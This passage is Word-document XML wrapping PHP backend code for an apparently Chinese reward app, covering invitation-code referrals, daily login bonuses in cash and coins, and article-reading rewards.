    <w:p w14:paraId="39D68F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money_num']=_money($v['money_num']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77454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m-d H:i',$v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3710A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8B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042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03EEB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3F6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ingxi(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563216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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA5B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22A77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type']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC53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2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04358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type']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1578ED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319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this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C0B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56783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b','a.uid = b.id']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9837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867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_records')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;order('a.time desc')-&gt;field('a.money,a.content,a.time,a.type,b.mobile,b.nickname,a.data,b.id')-&gt;paginate()-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961D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4AB075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_username($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E946F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m-d H:i',$v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FB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ontent']=$v['content'].(!$v['data'] ? '&lt;b class="sx-jia"&gt;+' : '&lt;b class="sx-jian"&gt;-').($v['type'] ? $v['money'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' : _money($v['money']).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>').'&lt;/b&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F46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6A0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74028A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8C9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yaoqingma(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C543C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ma=input('yaoqingma/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ACF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a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44978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请输入邀请码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0411EA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E4BCC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a == $this-&gt;member['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEBB9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不能自己当师傅哦</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DA8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7E29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yaoqing')-&gt;where(['uid'=&gt;$yaoqingma])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4514B0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45C99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邀请码不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62385A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E70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Db::name('yaoqing')-&gt;where('uid',$this-&gt;member['id'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073BF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D4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y['s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB0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3C0AD5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6B06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gt;where('uid',$this-&gt;member['id'])-&gt;setField('s1',$uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37736D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93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FCD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gt;insert(['uid'=&gt;$this-&gt;member['id'],'s1'=&gt;$uid]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261125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D51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5CEF1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BFA7B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uid)-&gt;setInc('tudi_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33557C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719E5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config()['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D9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yaoqing']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537255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643A1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this-&gt;member['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2372C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04ADB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yaoqing['money_yaoqing']*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C53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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邀请码注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DC3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6E2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DC5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3E9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yaoqing_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763B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167DE1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76314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5B670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yaoqing['money_yaoqing_s1']*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B249F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id:'.$this-&gt;member['id'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功邀请徒弟</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67164F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E5A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260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E9A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yaoqing['money_yaoqing'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恭喜你成功领取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_yaoqing'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元红包</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' : '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E397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text]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E93D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9B2C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操作失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FB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A1CC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2E4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aily(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BFC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269A4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config()['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA28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uid=$this-&gt;member['id'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54E7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1=$this-&gt;member['yaoqing']['s1']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26348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49394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money_login'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C7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login']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B9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每日登录奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23585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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每日登录奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7759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0C22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login_money=$yaoqing['money_login'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628A5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_moneyDb([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC95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t;$uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4635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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127543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money_login_money*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B6A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content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76007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C38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9B9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9BC0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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA639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money_login_money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恭喜每天上</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money_login_money."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入您的零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;"."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天上</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再领￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$money_login_money."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA9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52BB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FF9F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9B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1 &amp;&amp; $yaoqing['money_login_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631F9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每日登录奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164CA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161F9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46AB4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1CA3F6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t;$s1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593539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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC7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yaoqing['money_login_s1']*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16303D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content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B0E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F0A6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3AA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326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3CFA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login']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E7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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每日登录奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C9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35E92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_login_money=$yaoqing['jinbi_login'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3014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_moneyDb([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059FD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t;$uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60328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gt;[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA5F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jinbi_login_money,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322567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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每日登录奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F53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001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9478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846E5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ret)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DF1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jinbi_login_money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恭喜每天上</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$jinbi_login_money."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入您的账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;"."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天上</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再领</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$money_login_money."</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54496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5DA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9A14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357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1FF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1 &amp;&amp; $yaoqing['jinbi_login_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AADD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每日登录奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC97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6E0466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9E21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30F8B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t;$s1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A3E3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gt;[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17574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gt;$yaoqing['jinbi_login_s1'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF8F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gt;$content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60C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0D7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B41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4A3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9AF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money_news'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10E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news'] &amp;&amp; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605D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阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C5F8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like','%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%']])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD01C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3DBF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news_num'] &lt; $yaoqing['money_news_num']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C29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Inc('news_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593485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EFAE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AF1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Field('news_num',0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584AD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news'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA6C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7C242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11940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77AEA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01D535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6B655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EB2B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F7E5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332CC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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B3F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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>你今日已阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>篇文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱已放入你的零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明日再阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$yaoqing['money_news_num'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
